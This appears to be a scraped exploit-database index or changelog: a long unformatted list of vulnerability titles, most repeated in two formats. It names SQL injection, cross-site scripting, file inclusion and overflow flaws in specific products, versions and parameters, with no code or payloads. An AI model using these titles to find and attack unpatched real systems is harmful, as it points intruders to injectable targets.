
5 new exploits AWStats (5.0-6.3) Input Validation Hole in 'logfile' AWStats 5.0-6.3 - Input Validation Hole in 'logfile' Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross-Site Scripting Apache mod_perl 'Apache::Status' and 'Apache2::Status' - Cross-Site Scripting Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow Qualcomm WorldMail 3.0 - IMAPD LIST Buffer Overflow WorldMail imapd 3.0 SEH Overflow (egg hunter) WorldMail IMAPd 3.0 - SEH Overflow (Egg Hunter) e107 website system 0.7.5 contact.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 download.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 admin.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 fpw.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 news.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 - contact.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 - download.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 - admin.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 - fpw.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 - news.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 signup.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 submitnews.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 - signup.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 - submitnews.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 user.php Query String (PATH_INFO) Parameter XSS e107 website system 0.7.5 - user.php Query String (PATH_INFO) Parameter XSS Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution (Multithreaded Scanner) Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution (Multithreaded Scanner) (1) PHP-Nuke Sarkilar Module 'id' Parameter SQL Injection PHP-Nuke Sarkilar Module - 'id' Parameter SQL Injection PHP-Nuke Nuke League 
Module 'tid' Parameter Cross-Site Scripting PHP-Nuke Nuke League Module - 'tid' Parameter Cross-Site Scripting Kimson CMS 'id' Parameter Cross-Site Scripting Kimson CMS - 'id' Parameter Cross-Site Scripting Ocean12 FAQ Manager Pro 'Keyword' Parameter Cross-Site Scripting Multiple Ocean12 Products 'Admin_ID' Parameter SQL Injection Ocean12 FAQ Manager Pro - 'Keyword' Parameter Cross-Site Scripting Multiple Ocean12 Products - 'Admin_ID' Parameter SQL Injection LinksPro 'OrderDirection' Parameter SQL Injection LinksPro - 'OrderDirection' Parameter SQL Injection PHP-Nuke Downloads Module 'url' Parameter SQL Injection PHP-Nuke Downloads Module - 'url' Parameter SQL Injection PHP 5.2.9 cURL 'safe_mode' and 'open_basedir' Restriction-Bypass PHP 5.2.9 cURL - 'safe_mode' and 'open_basedir' Restriction-Bypass PuterJam\'s Blog PJBlog3 3.0.6 \'action.asp\' SQL Injection PuterJam's Blog PJBlog3 3.0.6 - 'action.asp' SQL Injection PHP-Nuke 8.0 Downloads Module 'query' Parameter Cross-Site Scripting PHP-Nuke 8.0 Downloads Module - 'query' Parameter Cross-Site Scripting Oracle 10g Secure Enterprise Search 'search_p_groups' Parameter Cross-Site Scripting Oracle 10g Secure Enterprise Search - 'search_p_groups' Parameter Cross-Site Scripting Scriptsez Easy Image Downloader 'id' Parameter Cross-Site Scripting Scriptsez Easy Image Downloader - 'id' Parameter Cross-Site Scripting XOOPS 2.3.3 \\\'op\\\' Parameter Multiple Cross-Site Scripting Vulnerabilities XOOPS 2.3.3 - 'op' Parameter Multiple Cross-Site Scripting Vulnerabilities Joomla! CB Resume Builder 'group_id' Parameter SQL Injection X-Cart Email Subscription 'email' Parameter Cross-Site Scripting Joomla! 
CB Resume Builder - 'group_id' Parameter SQL Injection X-Cart Email Subscription - 'email' Parameter Cross-Site Scripting RunCMS 'forum' Parameter SQL Injection RunCMS - 'forum' Parameter SQL Injection Multiple JiRo's Products 'files/login.asp' Multiple SQL Injection Multiple JiRo's Products - 'files/login.asp' Multiple SQL Injection Elxis 'filename' Parameter Directory Traversal Elxis - 'filename' Parameter Directory Traversal Ez Cart 'sid' Parameter Cross-Site Scripting Ez Cart - 'sid' Parameter Cross-Site Scripting Joomla! iF Portfolio Nexus 'controller' Parameter Remote File Inclusion Joomla! iF Portfolio Nexus - 'controller' Parameter Remote File Inclusion Joomla! Jobads 'type' Parameter SQL Injection Joomla! Jobads - 'type' Parameter SQL Injection Jamit Job Board 'post_id' Parameter Cross-Site Scripting Jamit Job Board - 'post_id' Parameter Cross-Site Scripting Tribisur 'cat' Parameter Cross-Site Scripting Tribisur - 'cat' Parameter Cross-Site Scripting Extreme Mobster 'login' Parameter Cross-Site Scripting Extreme Mobster - 'login' Parameter Cross-Site Scripting Subex Nikira Fraud Management System GUI 'message' Parameter Cross-Site Scripting Subex Nikira Fraud Management System GUI - 'message' Parameter Cross-Site Scripting Softbiz Jobs 'sbad_type' Parameter Cross-Site Scripting Softbiz Jobs - 'sbad_type' Parameter Cross-Site Scripting HD FLV Player Component for Joomla! 'id' Parameter SQL Injection HD FLV Player Component for Joomla! 
- 'id' Parameter SQL Injection Spectrum Software WebManager CMS 'pojam' Parameter Cross-Site Scripting Saskia's Shopsystem 'id' Parameter Local File Inclusion Spectrum Software WebManager CMS - 'pojam' Parameter Cross-Site Scripting Saskia's Shopsystem - 'id' Parameter Local File Inclusion Pars CMS 'RP' Parameter Multiple SQL Injection Pars CMS - 'RP' Parameter Multiple SQL Injection Kasseler CMS News Module 'id' Parameter SQL Injection Kasseler CMS News Module - 'id' Parameter SQL Injection Ziggurat Farsi CMS 'id' Parameter Unspecified Cross-Site Scripting Ziggurat Farsi CMS - 'id' Parameter Unspecified Cross-Site Scripting Vana CMS 'filename' Parameter Remote File Download Vana CMS - 'filename' Parameter Remote File Download Ziggurrat Farsi CMS 'bck' Parameter Directory Traversal Ziggurrat Farsi CMS - 'bck' Parameter Directory Traversal Viennabux Beta! 'cat' Parameter SQL Injection Viennabux Beta! - 'cat' Parameter SQL Injection HP System Management Homepage 'RedirectUrl' Parameter URI Redirection HP System Management Homepage - 'RedirectUrl' Parameter URI Redirection Sterlite SAM300 AX Router 'Stat_Radio' Parameter Cross-Site Scripting Sterlite SAM300 AX Router - 'Stat_Radio' Parameter Cross-Site Scripting Last Wizardz 'id' Parameter SQL Injection Last Wizardz - 'id' Parameter SQL Injection Plesk Server Administrator (PSA) 'locale' Parameter Local File Inclusion Plesk Server Administrator (PSA) - 'locale' Parameter Local File Inclusion VideoWhisper PHP 2 Way Video Chat 'r' Parameter Cross-Site Scripting VideoWhisper PHP 2 Way Video Chat - 'r' Parameter Cross-Site Scripting KubeSupport 'lang' Parameter SQL Injection KubeSupport - 'lang' Parameter SQL Injection ReCMS 'users_lang' Parameter Directory Traversal ReCMS - 'users_lang' Parameter Directory Traversal jCore 'search' Parameter Cross-Site Scripting jCore - 'search' Parameter Cross-Site Scripting PHP168 Template Editor 'filename' Parameter Directory Traversal PHP168 Template Editor - 'filename' Parameter 
Directory Traversal uzbl \'uzbl-core\' \'@SELECTED_URI\' Mouse Button Bindings Command Injection uzbl 'uzbl-core' - '@SELECTED_URI' Mouse Button Bindings Command Injection SyntaxCMS 'rows_per_page' Parameter SQL Injection Edit-X PHP CMS 'search_text' Parameter Cross-Site Scripting SyntaxCMS - 'rows_per_page' Parameter SQL Injection Edit-X PHP CMS - 'search_text' Parameter Cross-Site Scripting Nasim Guest Book 'page' Parameter Cross-Site Scripting Nasim Guest Book - 'page' Parameter Cross-Site Scripting FreeSchool 'key_words' Parameter Cross-Site Scripting FreeSchool - 'key_words' Parameter Cross-Site Scripting tourismscripts HotelBook 'hotel_id' Parameter Multiple SQL Injection tourismscripts HotelBook - 'hotel_id' Parameter Multiple SQL Injection Spiceworks 'query' Parameter Cross-Site Scripting Spiceworks - 'query' Parameter Cross-Site Scripting NWS-Classifieds 'cmd' Parameter Local File Inclusion NWS-Classifieds - 'cmd' Parameter Local File Inclusion WebAsyst Shop-Script PREMIUM 'searchstring' Parameter Cross-Site Scripting WebAsyst Shop-Script PREMIUM - 'searchstring' Parameter Cross-Site Scripting Web TV 'chn' Parameter Cross-Site Scripting Web TV - 'chn' Parameter Cross-Site Scripting Honest Traffic 'msg' Parameter Cross-Site Scripting Honest Traffic - 'msg' Parameter Cross-Site Scripting PHP Photo Vote 1.3F 'page' Parameter Cross-Site Scripting PHP Photo Vote 1.3F - 'page' Parameter Cross-Site Scripting Wap-motor 'image' Parameter Directory Traversal Wap-motor - 'image' Parameter Directory Traversal QuarkMail 'tf' Parameter Directory Traversal QuarkMail - 'tf' Parameter Directory Traversal Microsoft Windows VISTA 'lpksetup.exe' 'oci.dll' DLL Loading Arbitrary Code Execution Microsoft Windows VISTA - 'lpksetup.exe' 'oci.dll' DLL Loading Arbitrary Code Execution LES PACKS 'ID' Parameter SQL Injection LES PACKS - 'ID' Parameter SQL Injection PHPShop 2.1 EE 'name_new' Parameter Cross-Site Scripting PHPShop 2.1 EE - 'name_new' Parameter Cross-Site Scripting IBM 
OmniFind 'command' Parameter Cross-Site Scripting IBM OmniFind - 'command' Parameter Cross-Site Scripting Joomla Store Directory 'id' Parameter SQL Injection Joomla Store Directory - 'id' Parameter SQL Injection PHP State 'id' Parameter SQL Injection Joomla Jeformcr 'id' Parameter SQL Injection JExtensions Property Finder Component for Joomla! 'sf_id' Parameter SQL Injection PHP State - 'id' Parameter SQL Injection Joomla Jeformcr - 'id' Parameter SQL Injection JExtensions Property Finder Component for Joomla! - 'sf_id' Parameter SQL Injection Social Share 'postid' Parameter SQL Injection Social Share - 'postid' Parameter SQL Injection Openfiler 'device' Parameter Cross-Site Scripting Openfiler - 'device' Parameter Cross-Site Scripting Social Share 'username' Parameter SQL Injection Social Share - 'username' Parameter SQL Injection Social Share 'search' Parameter Cross-Site Scripting HotWeb Scripts HotWeb Rentals 'PageId' Parameter SQL Injection Social Share - 'search' Parameter Cross-Site Scripting HotWeb Scripts HotWeb Rentals - 'PageId' Parameter SQL Injection SnapProof 'retPageID' Parameter Cross-Site Scripting SnapProof - 'retPageID' Parameter Cross-Site Scripting VidiScript 'vp' Parameter Cross-Site Scripting VidiScript - 'vp' Parameter Cross-Site Scripting PHP-Fusion 'article_id' Parameter SQL Injection PHP-Fusion - 'article_id' Parameter SQL Injection Qianbo Enterprise Web Site Management System 'Keyword' Parameter Cross-Site Scripting RunCMS 'partners' Module 'id' Parameter SQL Injection Qianbo Enterprise Web Site Management System - 'Keyword' Parameter Cross-Site Scripting RunCMS 'partners' Module - 'id' Parameter SQL Injection Technicolor THOMSON TG585v7 Wireless Router 'url' Parameter Cross-Site Scripting Technicolor THOMSON TG585v7 Wireless Router - 'url' Parameter Cross-Site Scripting SyCtel Design 'menu' Parameter Multiple Local File Inclusion SyCtel Design - 'menu' Parameter Multiple Local File Inclusion phpGraphy 0.9.13 b 'theme_dir' Parameter 
Cross-Site Scripting phpGraphy 0.9.13 b - 'theme_dir' Parameter Cross-Site Scripting Web Auction 0.3.6 'lang' Parameter Cross-Site Scripting Web Auction 0.3.6 - 'lang' Parameter Cross-Site Scripting Multiple GoT.MY Products 'theme_dir' Parameter Cross-Site Scripting Multiple GoT.MY Products - 'theme_dir' Parameter Cross-Site Scripting Flash Tag Cloud And MT-Cumulus Plugin 'tagcloud' Parameter Cross-Site Scripting Flash Tag Cloud And MT-Cumulus Plugin - 'tagcloud' Parameter Cross-Site Scripting Joomla! 'com_cbcontact' Component 'contact_id' Parameter SQL Injection Joomla! 'com_cbcontact' Component - 'contact_id' Parameter SQL Injection Joomla! 'com_maplocator' Component 'cid' Parameter SQL Injection Joomla! 'com_maplocator' Component - 'cid' Parameter SQL Injection Tolinet Agencia 'id' Parameter SQL Injection Tolinet Agencia - 'id' Parameter SQL Injection WebFileExplorer 3.6 'user' and 'pass' SQL Injection WebFileExplorer 3.6 - 'user' and 'pass' SQL Injection Sitemagic CMS 'SMTpl' Parameter Directory Traversal Sitemagic CMS - 'SMTpl' Parameter Directory Traversal Nodesforum '_nodesforum_node' Parameter SQL Injection Joomla! 'com_morfeoshow' Component 'idm' Parameter SQL Injection Nodesforum - '_nodesforum_node' Parameter SQL Injection Joomla! 'com_morfeoshow' Component - 'idm' Parameter SQL Injection Joomla! 'com_jr_tfb' Component 'controller' Parameter Local File Inclusion Joomla! 
'com_jr_tfb' Component - 'controller' Parameter Local File Inclusion eTAWASOL 'id' Parameter SQL Injection eTAWASOL - 'id' Parameter SQL Injection Prontus CMS 'page' Parameter Cross-Site Scripting ICMusic '1.2 music_id' Parameter SQL Injection Prontus CMS - 'page' Parameter Cross-Site Scripting ICMusic 1.2 - 'music_id' Parameter SQL Injection Flowplayer 3.2.7 linkUrl' Parameter Cross-Site Scripting Flowplayer 3.2.7 - 'linkUrl' Parameter Cross-Site Scripting Easy Estate Rental 's_location' Parameter SQL Injection Joomla Foto Component 'id_categoria' Parameter SQL Injection Easy Estate Rental - 's_location' Parameter SQL Injection Joomla Foto Component - 'id_categoria' Parameter SQL Injection Joomla Juicy Gallery Component 'picId' Parameter SQL Injection Joomla Juicy Gallery Component - 'picId' Parameter SQL Injection Joomla Controller Component 'Itemid' Parameter SQL Injection Joomla Controller Component - 'Itemid' Parameter SQL Injection Synergy Software 'id' Parameter SQL Injection Godly Forums 'id' Parameter SQL Injection Synergy Software - 'id' Parameter SQL Injection Godly Forums - 'id' Parameter SQL Injection MyBB MyTabs Plugin 'tab' Parameter SQL Injection MyBB MyTabs Plugin - 'tab' Parameter SQL Injection mt LinkDatenbank 'b' Parameter Cross-Site Scripting mt LinkDatenbank - 'b' Parameter Cross-Site Scripting Joomla! Slideshow Gallery Component 'id' Parameter SQL Injection Joomla! Slideshow Gallery Component - 'id' Parameter SQL Injection Joomla! 'com_community' Component 'userid' Parameter SQL Injection Joomla! 
'com_community' Component - 'userid' Parameter SQL Injection phpWebSite 'page_id' Parameter Cross-Site Scripting phpWebSite - 'page_id' Parameter Cross-Site Scripting Tourismscripts Hotel Portal 'hotel_city' Parameter HTML Injection VicBlog 'tag' Parameter SQL Injection Tourismscripts Hotel Portal - 'hotel_city' Parameter HTML Injection VicBlog - 'tag' Parameter SQL Injection Kisanji 'gr' Parameter Cross-Site Scripting Kisanji - 'gr' Parameter Cross-Site Scripting Joomla! 'com_biitatemplateshop' Component 'groups' Parameter SQL Injection Joomla! 'com_biitatemplateshop' Component - 'groups' Parameter SQL Injection Vanira CMS 'vtpidshow' Parameter SQL Injection Vanira CMS - 'vtpidshow' Parameter SQL Injection Joomla! 'com_expedition' Component 'id' Parameter SQL Injection Joomla! 'com_expedition' Component - 'id' Parameter SQL Injection Joomla! 'com_tree' Component 'key' Parameter SQL Injection Joomla! 'com_br' Component 'state_id' Parameter SQL Injection Joomla! 'com_shop' Component 'id' Parameter SQL Injection Joomla! 'com_tree' Component - 'key' Parameter SQL Injection Joomla! 'com_br' Component - 'state_id' Parameter SQL Injection Joomla! 
'com_shop' Component - 'id' Parameter SQL Injection Splunk 4.1.6 'segment' Parameter Cross-Site Scripting Splunk 4.1.6 - 'segment' Parameter Cross-Site Scripting Multiple Cisco Products 'file' Parameter Directory Traversal Multiple Cisco Products - 'file' Parameter Directory Traversal IBSng B1.34(T96) 'str' Parameter Cross-Site Scripting IBSng B1.34(T96) - 'str' Parameter Cross-Site Scripting SmartJobBoard 'keywords' Parameter Cross-Site Scripting SmartJobBoard - 'keywords' Parameter Cross-Site Scripting Joomla Content Component 'year' Parameter SQL Injection Joomla Content Component - 'year' Parameter SQL Injection Webistry 1.6 'pid' Parameter SQL Injection Webistry 1.6 - 'pid' Parameter SQL Injection WordPress Skysa App Bar Plugin 'idnews' Parameter Cross-Site Scripting WordPress Skysa App Bar Plugin - 'idnews' Parameter Cross-Site Scripting Video Community Portal 'userID' Parameter SQL Injection Video Community Portal - 'userID' Parameter SQL Injection PHP Booking Calendar 10e 'page_info_message' Parameter Cross-Site Scripting Joomla! 'com_tsonymf' Component 'idofitem' Parameter SQL Injection PHP Booking Calendar 10e - 'page_info_message' Parameter Cross-Site Scripting Joomla! 'com_tsonymf' Component - 'idofitem' Parameter SQL Injection Joomla! 'com_caproductprices' Component 'id' Parameter SQL Injection Joomla! 'com_caproductprices' Component - 'id' Parameter SQL Injection GraphicsClone Script 'term' parameter Cross-Site Scripting GraphicsClone Script - 'term' parameter Cross-Site Scripting PostNuke pnAddressbook Module 'id' Parameter SQL Injection PostNuke pnAddressbook Module - 'id' Parameter SQL Injection Joomla! 'com_br' Component 'controller' Parameter Local File Inclusion Joomla! 'com_br' Component - 'controller' Parameter Local File Inclusion Joomla! Full 'com_full' Component 'id' Parameter SQL Injection Joomla! Full 'com_full' Component - 'id' Parameter SQL Injection Joomla! 'com_xball' Component 'team_id' Parameter SQL Injection Joomla! 
'com_boss' Component 'controller' Parameter Local File Inclusion Joomla! 'com_xball' Component - 'team_id' Parameter SQL Injection Joomla! 'com_boss' Component - 'controller' Parameter Local File Inclusion Joomla! 'com_some' Component 'controller' Parameter Local File Inclusion Joomla! 'com_bulkenquery' Component 'controller' Parameter Local File Inclusion Joomla! 'com_kp' Component 'controller' Parameter Local File Inclusion Joomla! 'com_some' Component - 'controller' Parameter Local File Inclusion Joomla! 'com_bulkenquery' Component - 'controller' Parameter Local File Inclusion Joomla! 'com_kp' Component - 'controller' Parameter Local File Inclusion Ultimate Locator 'radius' Parameter SQL Injection Joomla! 'com_jesubmit' Component 'index.php' Arbitrary File Upload Ultimate Locator - 'radius' Parameter SQL Injection Joomla! 'com_jesubmit' Component - 'index.php' Arbitrary File Upload Joomla! 'com_motor' Component 'cid' Parameter SQL Injection Joomla! 'com_motor' Component - 'cid' Parameter SQL Injection Joomla! 'com_firmy' Component 'Id' Parameter SQL Injection Joomla! 'com_firmy' Component - 'Id' Parameter SQL Injection Joomla! 'com_crhotels' Component 'catid' Parameter SQL Injection Joomla! 'com_propertylab' Component 'id' Parameter SQL Injection Joomla! 'com_crhotels' Component - 'catid' Parameter SQL Injection Joomla! 'com_propertylab' Component - 'id' Parameter SQL Injection Joomla! 'com_cmotour' Component 'id' Parameter SQL Injection Joomla! 'com_cmotour' Component - 'id' Parameter SQL Injection Joomla! 'com_bnf' Component 'seccion_id' Parameter SQL Injection Joomla! 'com_bnf' Component - 'seccion_id' Parameter SQL Injection Joomla! Currency Converter Component 'from' Parameter Cross-Site Scripting Joomla! 
Currency Converter Component - 'from' Parameter Cross-Site Scripting RabbitWiki 'title' Parameter Cross-Site Scripting RabbitWiki - 'title' Parameter Cross-Site Scripting Zimbra 'view' Parameter Cross-Site Scripting Zimbra - 'view' Parameter Cross-Site Scripting SMW+ 1.5.6 'target' Parameter HTML Injection SMW+ 1.5.6 - 'target' Parameter HTML Injection ProWiki 'id' Parameter Cross-Site Scripting ProWiki - 'id' Parameter Cross-Site Scripting Tiki Wiki CMS Groupware 'url' Parameter URI Redirection Tiki Wiki CMS Groupware - 'url' Parameter URI Redirection Impulsio CMS 'id' Parameter SQL Injection Impulsio CMS - 'id' Parameter SQL Injection Joomla! X-Shop Component 'idd' Parameter SQL Injection Joomla! X-Shop Component - 'idd' Parameter SQL Injection Joomla! 'com_xvs' Component 'controller' Parameter Local File Inclusion Joomla! 'com_xvs' Component - 'controller' Parameter Local File Inclusion starCMS 'q' Parameter URI Cross-Site Scripting starCMS - 'q' Parameter URI Cross-Site Scripting JPM Article Script 6 'page2' Parameter SQL Injection JPM Article Script 6 - 'page2' Parameter SQL Injection LeKommerce 'id' Parameter SQL Injection LeKommerce - 'id' Parameter SQL Injection Event Calendar PHP 'cal_year' Parameter Cross-Site Scripting Event Calendar PHP - 'cal_year' Parameter Cross-Site Scripting XM Forum 'id' Parameter Multiple SQL Injection Uiga FanClub 'p' Parameter SQL Injection XM Forum - 'id' Parameter Multiple SQL Injection Uiga FanClub - 'p' Parameter SQL Injection WordPress WPsc MijnPress Plugin 'rwflush' Parameter Cross-Site Scripting WordPress WPsc MijnPress Plugin - 'rwflush' Parameter Cross-Site Scripting Ramui Forum Script 'query' Parameter Cross-Site Scripting Ramui Forum Script - 'query' Parameter Cross-Site Scripting GD Star Rating 1.9.16 'tpl_section' Parameter Cross-Site Scripting GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting LongTail JW Player 'debug' Parameter Cross-Site Scripting LongTail JW Player - 'debug' Parameter 
Cross-Site Scripting Small-Cms 'hostname' Parameter Remote PHP Code Injection Small-Cms - 'hostname' Parameter Remote PHP Code Injection Joomla! Alphacontent Component 'limitstart' Parameter SQL Injection Joomla! Alphacontent Component - 'limitstart' Parameter SQL Injection Flogr 'tag' Parameter Multiple Cross-Site Scripting Vulnerabilities Flogr - 'tag' Parameter Multiple Cross-Site Scripting Vulnerabilities e107 Image Gallery Plugin 'name' Parameter Remote File Disclosure e107 Image Gallery Plugin - 'name' Parameter Remote File Disclosure Joomla! 'com_szallasok' Component 'id' Parameter SQL Injection Joomla! 'com_szallasok' Component - 'id' Parameter SQL Injection SWFUpload 'movieName' Parameter Cross-Site Scripting SWFUpload - 'movieName' Parameter Cross-Site Scripting WordPress SocialFit Plugin 'msg' Parameter Cross-Site Scripting WordPress custom tables Plugin 'key' Parameter Cross-Site Scripting WordPress church_admin Plugin 'id' parameter Cross-Site Scripting WordPress SocialFit Plugin - 'msg' Parameter Cross-Site Scripting WordPress custom tables Plugin - 'key' Parameter Cross-Site Scripting WordPress church_admin Plugin - 'id' parameter Cross-Site Scripting sflog! 'section' Parameter Local File Inclusion sflog! - 'section' Parameter Local File Inclusion WebsitePanel 'ReturnUrl' Parameter URI Redirection WebsitePanel - 'ReturnUrl' Parameter URI Redirection WordPress Post Recommendations Plugin 'abspath' Parameter Remote File Inclusion web@all 'name' Parameter Cross-Site Scripting WordPress Post Recommendations Plugin - 'abspath' Parameter Remote File Inclusion web@all - 'name' Parameter Cross-Site Scripting Joomla! 'com_hello' Component 'controller' Parameter Local File Inclusion Joomla! 
'com_hello' Component - 'controller' Parameter Local File Inclusion REDAXO 'subpage' Parameter Cross-Site Scripting Joomla Odudeprofile component 'profession' Parameter SQL Injection REDAXO - 'subpage' Parameter Cross-Site Scripting Joomla Odudeprofile component - 'profession' Parameter SQL Injection BarCodeWiz 'BarcodeWiz.dll' ActiveX Control 'Barcode' Method Remote Buffer Overflow BarCodeWiz 'BarcodeWiz.dll' ActiveX Control - 'Barcode' Method Remote Buffer Overflow JW Player 'playerready' Parameter Cross-Site Scripting eNdonesia 'cid' Parameter SQL Injection JW Player - 'playerready' Parameter Cross-Site Scripting eNdonesia - 'cid' Parameter SQL Injection ntop 'arbfile' Parameter Cross-Site Scripting ntop - 'arbfile' Parameter Cross-Site Scripting Elefant CMS 'id' Parameter Cross-Site Scripting Elefant CMS - 'id' Parameter Cross-Site Scripting YT-Videos Script 'id' Parameter SQL Injection YT-Videos Script - 'id' Parameter SQL Injection GetSimple 'path' Parameter Local File Inclusion GetSimple - 'path' Parameter Local File Inclusion LISTSERV 16 'SHOWTPL' Parameter Cross-Site Scripting LISTSERV 16 - 'SHOWTPL' Parameter Cross-Site Scripting JPM Article Blog Script 6 'tid' Parameter Cross-Site Scripting JPM Article Blog Script 6 - 'tid' Parameter Cross-Site Scripting KindEditor 'name' Parameter Cross-Site Scripting KindEditor - 'name' Parameter Cross-Site Scripting PHP Web Scripts Ad Manager Pro 'page' Parameter Local File Inclusion PHP Web Scripts Ad Manager Pro - 'page' Parameter Local File Inclusion JW Player 'logo.link' Parameter Cross-Site Scripting JW Player - 'logo.link' Parameter Cross-Site Scripting PHP Web Scripts Text Exchange Pro 'page' Parameter Local File Inclusion Joomla! Komento Component 'cid' Parameter SQL Injection PHP Web Scripts Text Exchange Pro - 'page' Parameter Local File Inclusion Joomla! 
Komento Component - 'cid' Parameter SQL Injection WordPress Cloudsafe365 Plugin 'file' Parameter Remote File Disclosure WordPress Cloudsafe365 Plugin - 'file' Parameter Remote File Disclosure Wiki Web Help 'configpath' Parameter Remote File Inclusion Wiki Web Help - 'configpath' Parameter Remote File Inclusion LiteSpeed Web Server 'gtitle' parameter Cross-Site Scripting LiteSpeed Web Server - 'gtitle' parameter Cross-Site Scripting WordPress Download Monitor Plugin 'dlsearch' Parameter Cross-Site Scripting WordPress Download Monitor Plugin - 'dlsearch' Parameter Cross-Site Scripting FBDj 'id' Parameter SQL Injection FBDj - 'id' Parameter SQL Injection vBSEO 'u' parameter Cross-Site Scripting vBSEO - 'u' parameter Cross-Site Scripting WordPress Crayon Syntax Highlighter Plugin 'wp_load' Parameter Remote File Inclusion WordPress Crayon Syntax Highlighter Plugin - 'wp_load' Parameter Remote File Inclusion TAGWORX.CMS 'cid' Parameter SQL Injection TAGWORX.CMS - 'cid' Parameter SQL Injection WordPress Video Lead Form Plugin 'errMsg' Parameter Cross-Site Scripting WordPress Video Lead Form Plugin - 'errMsg' Parameter Cross-Site Scripting WordPress Token Manager Plugin 'tid' Parameter Cross-Site Scripting WordPress Token Manager Plugin - 'tid' Parameter Cross-Site Scripting Neturf eCommerce Shopping Cart 'SearchFor' Parameter Cross-Site Scripting Neturf eCommerce Shopping Cart - 'SearchFor' Parameter Cross-Site Scripting WordPress ABC Test Plugin 'id' Parameter Cross-Site Scripting WordPress ABC Test Plugin - 'id' Parameter Cross-Site Scripting Open Realty 'select_users_lang' Parameter Local File Inclusion Open Realty - 'select_users_lang' Parameter Local File Inclusion FirePass 7.0 SSL VPN 'refreshURL' Parameter URI Redirection FirePass 7.0 SSL VPN - 'refreshURL' Parameter URI Redirection SMF 'view' Parameter Cross-Site Scripting SMF - 'view' Parameter Cross-Site Scripting Gramophone 'rs' Parameter Cross-Site Scripting Gramophone - 'rs' Parameter Cross-Site Scripting 
Joomla! com_parcoauto Component 'idVeicolo' Parameter SQL Injection Joomla! com_parcoauto Component - 'idVeicolo' Parameter SQL Injection OrangeHRM 'sortField' Parameter SQL Injection WordPress FLV Player Plugin 'id' Parameter SQL Injection OrangeHRM - 'sortField' Parameter SQL Injection WordPress FLV Player Plugin - 'id' Parameter SQL Injection WordPress Kakao Theme 'ID' Parameter SQL Injection WordPress PHP Event Calendar Plugin 'cid' Parameter SQL Injection WordPress Eco-annu Plugin 'eid' Parameter SQL Injection WordPress Kakao Theme - 'ID' Parameter SQL Injection WordPress PHP Event Calendar Plugin - 'cid' Parameter SQL Injection WordPress Eco-annu Plugin - 'eid' Parameter SQL Injection WordPress Dailyedition-mouss Theme 'id' Parameter SQL Injection WordPress Tagged Albums Plugin 'id' Parameter SQL Injection WordPress Dailyedition-mouss Theme - 'id' Parameter SQL Injection WordPress Tagged Albums Plugin - 'id' Parameter SQL Injection Omni-Secure 'dir' Parameter Multiple File Disclosure Vulnerabilities Friends in War The FAQ Manager 'question' Parameter SQL Injection Omni-Secure - 'dir' Parameter Multiple File Disclosure Vulnerabilities Friends in War The FAQ Manager - 'question' Parameter SQL Injection openSIS 'modname' Parameter Local File Inclusion openSIS - 'modname' Parameter Local File Inclusion WordPress Madebymilk Theme 'id' Parameter SQL Injection WordPress Madebymilk Theme - 'id' Parameter SQL Injection WordPress Zingiri Web Shop Plugin 'path' Parameter Arbitrary File Upload WordPress Webplayer Plugin 'id' Parameter SQL Injection WordPress Plg Novana Plugin 'id' Parameter SQL Injection WordPress Zingiri Web Shop Plugin - 'path' Parameter Arbitrary File Upload WordPress Webplayer Plugin - 'id' Parameter SQL Injection WordPress Plg Novana Plugin - 'id' Parameter SQL Injection WordPress Magazine Basic Theme 'id' Parameter SQL Injection WordPress Magazine Basic Theme - 'id' Parameter SQL Injection WordPress Ads Box Plugin 'count' Parameter SQL Injection 
WordPress Ads Box Plugin - 'count' Parameter SQL Injection Forescout CounterACT 'a' Parameter Open Redirection WordPress Wp-ImageZoom Theme 'id' Parameter SQL Injection Forescout CounterACT - 'a' Parameter Open Redirection WordPress Wp-ImageZoom Theme - 'id' Parameter SQL Injection WordPress Toolbox Theme 'mls' Parameter SQL Injection Elastix 'page' Parameter Cross-Site Scripting TinyMCPUK 'test' Parameter Cross-Site Scripting WordPress Toolbox Theme - 'mls' Parameter SQL Injection Elastix - 'page' Parameter Cross-Site Scripting TinyMCPUK - 'test' Parameter Cross-Site Scripting WordPress Zingiri Forums Plugin 'language' Parameter Local File Inclusion WordPress Nest Theme 'codigo' Parameter SQL Injection Sourcefabric Newscoop 'f_email' Parameter SQL Injection WordPress Zingiri Forums Plugin - 'language' Parameter Local File Inclusion WordPress Nest Theme - 'codigo' Parameter SQL Injection Sourcefabric Newscoop - 'f_email' Parameter SQL Injection FOOT Gestion 'id' Parameter SQL Injection FOOT Gestion - 'id' Parameter SQL Injection PHP Address Book 'group' Parameter Cross-Site Scripting PHP Address Book - 'group' Parameter Cross-Site Scripting Joomla! ZT Autolinks Component 'controller' Parameter Local File Inclusion Joomla! Bit Component 'controller' Parameter Local File Inclusion Joomla! ZT Autolinks Component - 'controller' Parameter Local File Inclusion Joomla! 
